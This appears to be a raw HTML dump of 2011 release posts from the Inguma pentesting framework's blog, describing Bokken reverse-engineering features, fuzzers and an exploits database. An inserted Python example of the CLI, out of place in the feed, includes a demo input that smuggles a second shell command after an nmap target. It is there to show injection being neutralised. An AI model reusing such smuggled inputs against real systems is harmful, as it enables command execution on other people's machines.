<li><b>Assembler/Disassembler</b>: create and export assembly code snippets in many architectures.</li>
<li>Visual representation of binary sections.</li>
<li><b>Advanced calculator</b> with many input and output formats.</li>
<li>File magic identification.</li>
</ul>
Finally, if you have problems with x86 assembly, stack internals or other issues, take a look at the RCE cheat sheet included.</div>
<div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4zRyKaoANkRTNPpQd-JV6kmGKssF22rFg_4BSi_Sy6wyvyx5jz7cYta4TTRHYt1pVRl0TE7dlLxyeA66Wy9s7L0k74_wSh0LK989rVHgcHMPfLgBuialSe2mNXPvhSRjtqTTciI-kPAQo/s1600/bokken-cheatsheet.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4zRyKaoANkRTNPpQd-JV6kmGKssF22rFg_4BSi_Sy6wyvyx5jz7cYta4TTRHYt1pVRl0TE7dlLxyeA66Wy9s7L0k74_wSh0LK989rVHgcHMPfLgBuialSe2mNXPvhSRjtqTTciI-kPAQo/s400/bokken-cheatsheet.png" width="400" /></a></div>
<br /></div>
<div>
There are many other new hidden features waiting to be discovered in this release, too many to mention here; take a look at the <a href="http://inguma.eu/projects/bokken/wiki/Wiki">project documentation</a> to discover and learn about them. Now it's time for you to <a href="http://inguma.eu/projects/bokken/files">download</a> and <a href="http://inguma.eu/projects/bokken/wiki/Installation">install</a> :-)</div>
<div>
<br />
A Windows installer and Debian packages will be available soon but, meanwhile, manual installation is easy and straightforward.<br />
<br /></div>
<div>
We hope you enjoy this release as much as we did working on it and, as always, send us your feedback, bugs, and requests to our mailing list:</div>
<div>
<br /></div>
<div>
bokken-devel at inguma.eu</div>
<div>
<br />
Special thanks for this release go to:<br />
<br />
<ul>
<li>@trufae and @earada for radare2, their help and testing</li>
<li>@zxlain for the OSX testing and encouragement</li>
<li>@huahe for the incredible logo</li>
</ul>
<br />
Thanks and stay tuned (in <a href="http://twitter.com/ingumito">@ingumito</a>)!</div>htesohttp://www.blogger.com/profile/06933489709636162052noreply@blogger.com0tag:blogger.com,1999:blog-8320914018667085850.post-37437050668818394322011-10-26T20:27:00.002+02:002011-10-27T22:42:11.269+02:00A new release is coming<div style="text-align: left;">Once again it's been a long time since our last update. The team has switched gears and now we are in a sprint to finish a new release of <a href="http://inguma.eu/projects/bokken">Bokken</a>. As you probably know, Bokken is <b>the RCE utility that we use in Inguma</b>, and we have been very busy adding tons of features and polishing the interface.</div><div><br /></div><div>If Bokken 1.0 had 39 commits, for the new release we are near 200, so expect lots of changes, bug fixes and improvements. Let's view some of the major ones.</div><div><br /></div><div>The first thing you will notice is that the GUI has changed dramatically, not just to be adapted to the new features but we also have made many changes in order to make it clearer, more intuitive and easier to use. 
But a picture is worth a thousand words:</div><div><br /></div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfjz4vTfQ6uIiucCXncQ3t7rR-wx7urAL987HucxRoXHhjdkla2SkWPo9uvCHR53YIDkTK03F6LVpYicqU7ZUu6E0darklrzwv0ZymyuWzqbDxMHfNQjaIzwtJnzoiSWnTfjI1Q5Bf4tCA/s1600/bokken-new-gui.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 170px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfjz4vTfQ6uIiucCXncQ3t7rR-wx7urAL987HucxRoXHhjdkla2SkWPo9uvCHR53YIDkTK03F6LVpYicqU7ZUu6E0darklrzwv0ZymyuWzqbDxMHfNQjaIzwtJnzoiSWnTfjI1Q5Bf4tCA/s320/bokken-new-gui.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5668196196304574914" /></a><br /><div><i>"Coming soon"</i>,<i> "WIP"</i> or <i>"for the next release"</i> are expressions that the Inguma team doesn't like, so another major feature of Bokken 1.5 has been to remove the <i>"soon"</i> regarding the radare backend! And yes, we made it.</div><div><br /></div><div>Now Bokken can be used with all the power of radare and the ease of use of our GUI. 
Take a look at the <a href="http://radare.org/">radare</a> website to learn about the features of this powerful backend.</div><br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjU617xsQ33in4E9ZYtu2rUYUltQBiG0g-ger5k2TFOledV1-RMdWg-478jA1Kut3dfctym1wjK8uYheG3o0ygghLr-mqKKvJtGyMrWJyLKGmuair8tIOTeIEK4k0lmCH_dYHfturbiKTIU/s1600/bokke-new-gui-2.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 170px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjU617xsQ33in4E9ZYtu2rUYUltQBiG0g-ger5k2TFOledV1-RMdWg-478jA1Kut3dfctym1wjK8uYheG3o0ygghLr-mqKKvJtGyMrWJyLKGmuair8tIOTeIEK4k0lmCH_dYHfturbiKTIU/s320/bokke-new-gui-2.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5668196555459237986" /></a><br />Also almost all the views/tabs of Bokken have received some amount of love and have new features or improvements like:<br /><div><ul><li>The long-awaited <b>code navigation</b>.</li><li>Improved flowgraph view.</li><li>More<b> interactive hexdump</b>.</li><li>Many new features for working with URLs</li><li>New plugins like: (yes!) <b>bindiffing</b>, calculator, assembler, and more...</li></ul></div><div><div>And that's all for now. 
Complete and detailed information of all the new features will be shown in the <b>upcoming release</b> post.</div></div><div><br /></div><div>Don't forget to follow us on the project's <a href="http://twitter.com/ingumito">twitter</a> and send your ideas and comments to our mailing list:</div><div><br /></div><div><span class="Apple-style-span">bokken-devel (at) inguma.eu</span></div><div><br /></div><div>Stay tuned.</div>Enderhttp://www.blogger.com/profile/14709596788489094437noreply@blogger.com2tag:blogger.com,1999:blog-8320914018667085850.post-48673651410336333482011-09-14T20:11:00.000+02:002011-09-19T20:12:56.588+02:00Inguma 0.4 is out!<span class="Apple-style-span" style="font-family: 'Times New Roman'; font-size: medium;">Trying to follow a three months release cycle, today we are proud to announce the next version of the Inguma Project, in short Inguma v0.4. As always, let's see the new features we added this time:</span>
<ul>
<li style="font-family: 'Times New Roman'; font-size: medium;"><b>The GUI</b> has been modified and cleaned in order to give more space to the most active areas like the network map, the RCE interface or the exploits/fuzzing areas.</li>
<ul>
<li style="font-family: 'Times New Roman'; font-size: medium;">The last opened/saved KBs are now easily accessible on the toolbar.</li>
<li style="font-family: 'Times New Roman'; font-size: medium;">A warning icon appears in the "Logs" tab when new content is available.</li>
<li style="font-family: 'Times New Roman'; font-size: medium;">The bottom status bar has gained more functionality showing information regarding KB in use and targets or vulnerabilities discovered.</li>
</ul>
</ul>
<div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqgA9AAxftS4waKFhvv6SUDy0wT-X5zJ5jMErn2WQiYYoC0k3AbqkCX2nrcr4CAjELerJnTxQ-dcamuXH5qgIQTUx7op-xAgrJ2RwkcPfMIQleCorW-oM6cerieUmn7WDGFAbAcgBD5Mtm/s1600/statusbar.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5651813797920641202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqgA9AAxftS4waKFhvv6SUDy0wT-X5zJ5jMErn2WQiYYoC0k3AbqkCX2nrcr4CAjELerJnTxQ-dcamuXH5qgIQTUx7op-xAgrJ2RwkcPfMIQleCorW-oM6cerieUmn7WDGFAbAcgBD5Mtm/s320/statusbar.png" style="display: block; height: 30px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 255px;" /></a></div>
<ul>
<li style="font-family: 'Times New Roman'; font-size: medium;">We have <b>updated the <a href="http://bokken.inguma.eu/">Bokken</a></b> subproject to the latest stable version available, v1.0. It features an interactive mode, better code disassembly and analysis, and better integration with Inguma's GUI. More information about Bokken can be found <a href="http://bokken.inguma.eu/projects/bokken/wiki/Wiki">here</a>.</li>
</ul>
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLpvXab_jp_WW_Hl-UXHe7wklLrorptuq4d19_WCBHOOvy3W42n2ECiC0W2mSrvRGHjhN5kMDIvoZaHN0kbVjIuhzh_QhEZFUvM-1TnBNgdkFc_EZUhBeCEbFeisTWa31n876Zhqd2HvDa/s1600/bokken.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLpvXab_jp_WW_Hl-UXHe7wklLrorptuq4d19_WCBHOOvy3W42n2ECiC0W2mSrvRGHjhN5kMDIvoZaHN0kbVjIuhzh_QhEZFUvM-1TnBNgdkFc_EZUhBeCEbFeisTWa31n876Zhqd2HvDa/s320/bokken.png" width="320" /></a>
</div>
<ul>
<li style="font-family: 'Times New Roman'; font-size: medium;">The <b>systray</b> functionality now lets you hide the Inguma GUI while it's working, and it will warn you once the running modules have finished.</li>
<li style="font-family: 'Times New Roman'; font-size: medium;">A <b>new fuzzing tab</b> has been added to the Exploits workspace with two different fuzzers: Krash and Scapy.</li>
</ul>
<ul><span class="Apple-style-span" style="-webkit-text-decorations-in-effect: underline;"><div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlfEvxeJ1dcuLhqKfJE3I6knpcullXiKwQuFo2YTQZ9MVdMF2F5gelWoXomOtapnu6gLlWx7DQ1btrvdH2a95STriu0UdgJQAmd0nbF3iUspKdDPah6Jnb0PcPKFC9P5Uwgv9-pPAhRfOl/s1600/fuzzing.png" imageanchor="1" style="color: #0000ee; font-family: Georgia, serif; margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlfEvxeJ1dcuLhqKfJE3I6knpcullXiKwQuFo2YTQZ9MVdMF2F5gelWoXomOtapnu6gLlWx7DQ1btrvdH2a95STriu0UdgJQAmd0nbF3iUspKdDPah6Jnb0PcPKFC9P5Uwgv9-pPAhRfOl/s320/fuzzing.png" width="320" /></a></div>
<div style="font-family: Georgia, serif; text-align: left;">
<br /></div>
</span><ul>
<li style="font-family: 'Times New Roman'; font-size: medium;"><b>Krash fuzzer</b> has been part of Inguma project for a while but now it can be used directly from the GUI. Just select the target, the packet to be fuzzed and press start. Read more about Krash fuzzer <a href="http://inguma.eu/projects/inguma/documents">here</a>.</li>
<li style="font-family: 'Times New Roman'; font-size: medium;">The <b>Scapy fuzzer</b> is a GUI wrapper around Scapy's fuzz function that makes network fuzzing very easy. It's fully drag-and-drop-driven: to start, you just compose a packet by dropping layers, select the layers/fields to be fuzzed and select an output directory to save the sent and received packets.</li>
</ul>
</ul>
<div>
<span class="Apple-style-span"><span class="Apple-style-span" style="font-family: Georgia, serif; font-size: 16px;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdhu76ARiSrvQ7gnm0VCYj5D-vJ-mMJ0GpuH_ihsm0z4xAKlzfb9Wf94dfX1cgYi8UewIOrf56dYTy3QUDkVA0X9xUtwUvDpwXVTG2cVpNltKRhKhoYY2EL2A3W15JufibnJWphtVnhDp2/s1600/fuzz_menu.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5651813967768458258" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdhu76ARiSrvQ7gnm0VCYj5D-vJ-mMJ0GpuH_ihsm0z4xAKlzfb9Wf94dfX1cgYi8UewIOrf56dYTy3QUDkVA0X9xUtwUvDpwXVTG2cVpNltKRhKhoYY2EL2A3W15JufibnJWphtVnhDp2/s320/fuzz_menu.png" style="cursor: pointer; display: block; height: 215px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 260px;" /></a></span></span></div>
<ul>
<li style="font-family: 'Times New Roman'; font-size: medium;">The <b>CLI interface</b> has received some attention again and a few new shortcuts like '?' for help or '..' to go back to the main menu are now available in nearly all the modules.</li>
<ul>
<li style="font-family: 'Times New Roman'; font-size: medium;">Inguma CLI now works better on MacOS with autocompletion and key bindings.</li>
<li style="font-family: 'Times New Roman'; font-size: medium;">All the fuzzing modules are now under the fuzzers category and have been fixed.</li>
</ul>
</ul>
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">
Inguma v0.4
Copyright (c) 2006-2008 Joxean Koret &lt;joxeankoret@yahoo.es&gt;
Copyright (c) 2009-2011 Hugo Teso &lt;hugo.teso@gmail.com&gt;
<br />
Type 'help' for a short usage guide.
inguma> nmapscan
inguma/nmapscan> ?
<br />
Inguma's Nmap Interface Help
------------------------------
<br />
help Show this help
nmaphelp Show Nmap's help
nmap &lt;options&gt; Execute Nmap with options specified
exit Exit from nmapscan interface
<br />
inguma/nmapscan> ..
inguma> ..
Exit.
</span>
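The navigation shown in the transcript above ('?' for help, '..' to go back) can be sketched as a small dispatcher; this is an added example, not Inguma's own code, and the class, function and action names are hypothetical. It also shows one way a wrapper command like `nmap <options>` can hand the typed options to the external binary as an argument list, so shell metacharacters in the input stay literal.

```python
import shlex

# Help text modelled on the transcript above (assumption: not copied from Inguma's source).
NMAPSCAN_HELP = {
    "help": "Show this help",
    "nmaphelp": "Show Nmap's help",
    "nmap <options>": "Execute Nmap with options specified",
    "exit": "Exit from nmapscan interface",
}
# Hypothetical main-menu help; the real main menu lists many more modules.
MAIN_HELP = {"nmapscan": "Enter the Nmap interface", "exit": "Leave Inguma"}

# The two shortcuts named in the release notes, mapped to the long commands.
SHORTCUTS = {"?": "help", "..": "exit"}


def build_nmap_argv(options):
    """Turn the text typed after 'nmap' into an argv list.

    shlex.split() honours quoting but gives ';', '|', '&' or '$()' no special
    meaning. The list is meant for subprocess.run(argv) WITHOUT shell=True, so
    a typed ';' reaches nmap as part of an ordinary argument instead of
    starting a second command. Raises ValueError on unbalanced quotes.
    Note: this only removes shell interpretation; the options still control
    nmap itself (for example its output-file flags).
    """
    return ["nmap"] + shlex.split(options)


class Shell:
    """Minimal two-level interpreter: main menu -> module sub-interface."""

    def __init__(self):
        self.context = []  # [] is the main menu, ["nmapscan"] is inside the module

    @property
    def prompt(self):
        return "/".join(["inguma"] + self.context) + "> "

    def handle(self, line):
        """Process one input line and return an (action, payload) tuple."""
        words = line.strip().split(None, 1)
        if not words:
            return ("noop", None)
        cmd = SHORTCUTS.get(words[0], words[0])
        rest = words[1] if len(words) > 1 else ""

        if cmd == "exit":
            if self.context:          # '..' inside a module goes back one level
                self.context.pop()
                return ("back", self.prompt)
            return ("quit", "Exit.")  # '..' at the main menu leaves the tool
        if cmd == "help":
            return ("help", NMAPSCAN_HELP if self.context else MAIN_HELP)

        if not self.context:
            if cmd == "nmapscan":
                self.context.append("nmapscan")
                return ("enter", self.prompt)
            return ("unknown", cmd)

        if cmd == "nmaphelp":
            return ("run", ["nmap", "--help"])
        if cmd == "nmap":
            try:
                return ("run", build_nmap_argv(rest))
            except ValueError as exc:  # e.g. a quote that is never closed
                return ("error", str(exc))
        return ("unknown", cmd)


def replay(lines):
    """Feed a list of input lines to a fresh Shell and collect the results."""
    shell = Shell()
    return [shell.handle(line) for line in lines]


if __name__ == "__main__":
    # Constructed session; 192.0.2.10 is a documentation-only address.
    session = ["nmapscan", "?", "nmap -sV 192.0.2.10; id", "nmap 'oops", "..", ".."]
    for typed, result in zip(session, replay(session)):
        print(repr(typed), "->", result)
```

Nothing is executed here: a `("run", argv)` result is what a caller would pass to `subprocess.run(argv)`.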
<ul>
<li style="font-family: 'Times New Roman'; font-size: medium;">Some additional minor changes include:</li>
<ul style="font-family: 'Times New Roman'; font-size: medium;">
<li>A new module to find subdomains is now available.</li>
<li>The option to automatically audit a new target has been added to the "New target" dialog.</li>
</ul>
<span class="Apple-style-span" style="-webkit-text-decorations-in-effect: underline;"><br /><span class="Apple-style-span"><span class="Apple-style-span" style="margin-left: auto; margin-right: auto;"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5651811398839857090" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPHSiTwyobIZ746fzBwxijaaIAHd4CxNdAeAuypaJwpf_0mHib1_Elx2nsPVdY46tgtxWN0ZQn8jUEb1l3dEKV7E4pgZk-8ucNso8449vpnwcv8X5B5K_HXj4-xLX8RMF3ygnlthtBO_Xz/s320/target_audit_host.png" style="cursor: pointer; display: block; height: 150px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 208px;" /></span></span></span><ul>
<li>Lots of code refactoring and bugs fixed.</li>
</ul>
</ul>
<div>
<span class="Apple-style-span"><b>Get the new release</b> <a href="http://inguma.eu/projects/inguma/files">here</a> while it's hot, and stay tuned for the latest Inguma and Bokken developments on the project <a href="http://inguma.eu/projects/inguma/wiki/Contact">mailing lists</a> or the Twitter <a href="http://twitter.com/ingumito">profile</a>.</span></div>
htesohttp://www.blogger.com/profile/06933489709636162052noreply@blogger.com0tag:blogger.com,1999:blog-8320914018667085850.post-49973283022752171642011-08-16T03:41:00.000+02:002011-08-16T03:41:55.382+02:00Rooted CON Inguma video available.The <a href="http://www.rootedcon.es/">Rooted CON</a> media team have released the videos from the <a href="http://www.rootedcon.es/congreso/rootedforge.html">RootedForge event</a> that happened in Madrid on March 3rd, 2011. There Hugo Teso talked about the past, present and a bit of the future of the Inguma project. It's only in Spanish, sorry!<br />
<br />
<div style="text-align: center;"><iframe frameborder="0" height="300" src="http://player.vimeo.com/video/27582938?title=0&byline=0&portrait=0" width="400"></iframe></div><div style="text-align: center;"><a href="http://vimeo.com/27582938">RootedForge - Proyecto Inguma - Hugo Teso (Rooted CON 2011)</a> from <a href="http://vimeo.com/rootedcon">rootedcon</a> on <a href="http://vimeo.com/">Vimeo</a>.</div>Enderhttp://www.blogger.com/profile/14709596788489094437noreply@blogger.com0Madrid, España40.4166909 -3.7003454000000640.2509674 -3.88584290000006 40.5824144 -3.5148479000000603tag:blogger.com,1999:blog-8320914018667085850.post-37606413393925537602011-07-05T10:35:00.011+02:002011-08-15T05:09:54.081+02:00Bokken 1.0 has landed<div style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkyMsIiUyKzEA6VCy5FQzpRX0WkTXcl1pvqJDBICpIhL15s3Sd8vx3wETDVsRRHfNxKbk6XKbtJ_OV-EkUWuyoLHrf_HYOcy3hU6l274qhHU6PBhjABhHereIPTCZv3wpycl_eVUYCQJ0_/s1600/bokken_kanji_juntos_horizontal_300.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5625785402795512290" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkyMsIiUyKzEA6VCy5FQzpRX0WkTXcl1pvqJDBICpIhL15s3Sd8vx3wETDVsRRHfNxKbk6XKbtJ_OV-EkUWuyoLHrf_HYOcy3hU6l274qhHU6PBhjABhHereIPTCZv3wpycl_eVUYCQJ0_/s400/bokken_kanji_juntos_horizontal_300.png" style="cursor: hand; cursor: pointer; display: block; height: 135px; margin: 0px auto 10px; text-align: center; width: 300px;" /></a></div><div>Today we are releasing a new tool of the Inguma project: <b>Bokken</b>.</div><div><br />
</div><div>In <a href="http://ingumadev.blogspot.com/2011/05/welcome-to-inguma-version-03.html">Inguma 0.3</a>, an early version of Bokken was included as the RCE tool of the project.</div><br />
<div>Now we are giving it as a standalone tool.<br />
</div><br />
<div>Bokken is a GUI for the <a href="http://code.google.com/p/pyew/">Pyew</a> tool,<b> a *iew like tool for malware analysis</b>, so with Bokken you can do almost the same as with Pyew but with a nice GUI :-). Actually Bokken can parse and help in the analysis of <b>PE/Elf, PDF and websites</b>; any other file can be also opened and studied but Bokken won't analyze it.</div><div><br />
</div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbLwctRqe1Uyc6Hf36DHxtnkvMLULav-jXDFzS2au-_oNu7pAU62hKVbZ3Fds2hlWfSrReXUn0uIUwbmCis0XqWyatj__cTxEEOa1II5ymi8JkaW-wjq_VFPo_pL6jfLKKpk01O3guINkI/s1600/Bokken-1.0.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5625785851323379874" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbLwctRqe1Uyc6Hf36DHxtnkvMLULav-jXDFzS2au-_oNu7pAU62hKVbZ3Fds2hlWfSrReXUn0uIUwbmCis0XqWyatj__cTxEEOa1II5ymi8JkaW-wjq_VFPo_pL6jfLKKpk01O3guINkI/s320/Bokken-1.0.png" style="cursor: pointer; display: block; height: 170px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 320px;" /></a></div><div>To get a full description of the project features, installation instructions or just get the code go to the <a href="http://bokken.inguma.eu/">project site</a>.</div><div><br />
</div><div>Enjoy the new tool and don't forget to send us the <a href="http://bokken.inguma.eu/projects/bokken/issues/new">bugs</a> you find, <i>feature requests</i> or any other <a href="http://bokken.inguma.eu/projects/bokken/wiki/Contact">feedback</a> that you consider can help improve the project.</div>htesohttp://www.blogger.com/profile/06933489709636162052noreply@blogger.com0Madrid, España40.4166909 -3.7003454000000640.2509674 -3.88584290000006 40.5824144 -3.5148479000000603tag:blogger.com,1999:blog-8320914018667085850.post-46477942549343460722011-06-13T11:40:00.008+02:002011-07-05T19:49:34.175+02:00Welcome to Inguma version 0.3<div style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsUZwMyIXLlnul20R8WFRFmXt_oLtTptZqAh6O3Ek8pzuSGMS3SjlXks1eaMKbmjjH2yQOiZKAWlAYreY3k9cOsbt_Tt1qXnVKJnm93LCO7jHzLm-lOQ8sF9d5UXPGBZ2VIaL9kEaexo_i/s1600/top.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5615815089107193170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsUZwMyIXLlnul20R8WFRFmXt_oLtTptZqAh6O3Ek8pzuSGMS3SjlXks1eaMKbmjjH2yQOiZKAWlAYreY3k9cOsbt_Tt1qXnVKJnm93LCO7jHzLm-lOQ8sF9d5UXPGBZ2VIaL9kEaexo_i/s400/top.png" style="cursor: hand; cursor: pointer; display: block; height: 90px; margin: 0px auto 10px; text-align: center; width: 400px;" /></a></div><div style="text-align: left;">The Inguma team is very proud to release version 0.3 of their pentesting and vulnerability research framework. The new release increases stability (mainly the GUI) thanks to lots of bugs fixed, offers a smoother experience and, of course, includes some awesome features:</div><div><ul><li>Together with the new release we would like to introduce our project's new pet, Ingumito. He will keep all our users informed of the project news through his twitter account: <a href="http://twitter.com/Ingumito">@ingumito</a></li>
</ul><div><span class="Apple-style-span" style="-webkit-text-decorations-in-effect: underline; color: #0000ee;"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5616143946442966786" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZeA1ecgDc_Eb4N4XDC3nTe4UMCMPus4AI0lzTAn3SnAnER0IqpLDVZqKrcP7qJ-qR5XosfmqaXPIBiRVrS5VcoxgPvm2A4oMi5p7vft7AM9TDXNUP37biVRzSbyDbu7NpDLkrWnEHRXuQ/s400/Ingumito.png" style="cursor: pointer; display: block; height: 267px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 400px;" /></span></div><ul><li>A new module has been added to<b> map the IP addresses</b> using the GeoIP library from <a href="http://www.maxmind.com/">MaxMind</a>:</li>
</ul><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ4elvsExyGrWvNuErfS9lHrgYaTvxmbNs3o2wXb9nUF8oYpKgjtQgOBVho2B_iGoyom3jptKlLSz46IAIyce6gbdMKsWp-HIgd0Sq1tzRQtnAsOmqFUENu4nvMyHphYIopQM7AMgCBdRr/s1600/GeoIP.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5615465577772237938" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ4elvsExyGrWvNuErfS9lHrgYaTvxmbNs3o2wXb9nUF8oYpKgjtQgOBVho2B_iGoyom3jptKlLSz46IAIyce6gbdMKsWp-HIgd0Sq1tzRQtnAsOmqFUENu4nvMyHphYIopQM7AMgCBdRr/s320/GeoIP.png" style="cursor: pointer; display: block; height: 219px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 320px;" /></a></div><ul><li>By Ctrl + right clicking over a target a new menu entry will allow to <b>remove the target</b> and all its nodes from the map and the KB:</li>
</ul><div><span class="Apple-style-span" style="-webkit-text-decorations-in-effect: underline; color: #0000ee;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5Dar5hQPehD37-w4_wtoxed0TusPO2g276ouFYUHRQJFbYxX0exSBMRgNPZa0XjIdEEieCDp9-EYp44MOsm0fJIEk7yM86Bbh8WVTcnapbiGrOJXuw3eM_eLLM4Hc_dHJeGHxhy4BMn8v/s1600/Remove.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5615466405418476258" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5Dar5hQPehD37-w4_wtoxed0TusPO2g276ouFYUHRQJFbYxX0exSBMRgNPZa0XjIdEEieCDp9-EYp44MOsm0fJIEk7yM86Bbh8WVTcnapbiGrOJXuw3eM_eLLM4Hc_dHJeGHxhy4BMn8v/s320/Remove.png" style="cursor: pointer; display: block; height: 172px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 320px;" /></a></span></div><ul><li>Additional information regarding a vulnerability can be obtained by right clicking over a vulnerability node:</li>
</ul><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSPaX1b8xCqrNz-1zLYA8-DwWBWkA448iCu_GKtIOeZ5FeQ6gGA0GvkJ2u0ZLTltohO7b_s8UALnGJ6vl0_g5hLjN6yzy8TgkfHXWgYVmRnkperNuWpBGzQegbTSIpYYSYG1sRgmRHqwA0/s1600/web_vuln.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5615466867468291570" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSPaX1b8xCqrNz-1zLYA8-DwWBWkA448iCu_GKtIOeZ5FeQ6gGA0GvkJ2u0ZLTltohO7b_s8UALnGJ6vl0_g5hLjN6yzy8TgkfHXWgYVmRnkperNuWpBGzQegbTSIpYYSYG1sRgmRHqwA0/s320/web_vuln.png" style="cursor: pointer; display: block; height: 170px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 320px;" /></a></div><ul><li>The <i>Add Target</i> dialog must be improved to allow multiple IP addresses and other inputs but, meanwhile, the import dialog now supports a comma-separated CSV file to be used as <b>multiple IP input</b>.</li>
</ul><ul><li>The exploits download and load process has been simplified; download the exploits at the Preferences dialog and use the <i>Search</i> button to load the exploits. Once loaded, this button will search through the exploits DB.</li>
</ul><ul><li>The most important change of this new release is the <b>complete rewrite of the RCE interface and core.</b> OpenDis has been removed, and so the objdump dependency, and a new interface has been added that uses <a href="http://code.google.com/p/pyew/">Pyew</a> as backend:</li>
</ul><div><span class="Apple-style-span" style="-webkit-text-decorations-in-effect: underline; color: #0000ee;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlK0PYx_jz_fp0qT88OrW0_nat1rkAGJWXBAvB1iHTI8N8mBJK3b7QhaGkZNsjsq1PHk9Rob7lc5CDMBuDbsPUtY2k5oB-MXGI6iw_YaJawpM0EwrUSXMsBtWuhEnVdJBIWJlOlWTraIIN/s1600/bokken.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5615467774763247122" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlK0PYx_jz_fp0qT88OrW0_nat1rkAGJWXBAvB1iHTI8N8mBJK3b7QhaGkZNsjsq1PHk9Rob7lc5CDMBuDbsPUtY2k5oB-MXGI6iw_YaJawpM0EwrUSXMsBtWuhEnVdJBIWJlOlWTraIIN/s320/bokken.png" style="cursor: pointer; display: block; height: 170px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 320px;" /></a></span></div><div><span class="Apple-style-span"><br />
</span></div>This new interface offers most of the Pyew features in an easy-to-use GUI. Analyzing almost any kind of file or web site is now easier with this new release! This GUI for RCE is a new subproject of Inguma called Bokken and will be released soon on our website as an independent tool. Stay tuned!</div><div><br />
</div><div>The RCE interface will analyze PE, ELF, PDF and web sites, and will open any other file in the hex editor. An image is worth a thousand words, so here you have two thousand of them:<br />
<br />
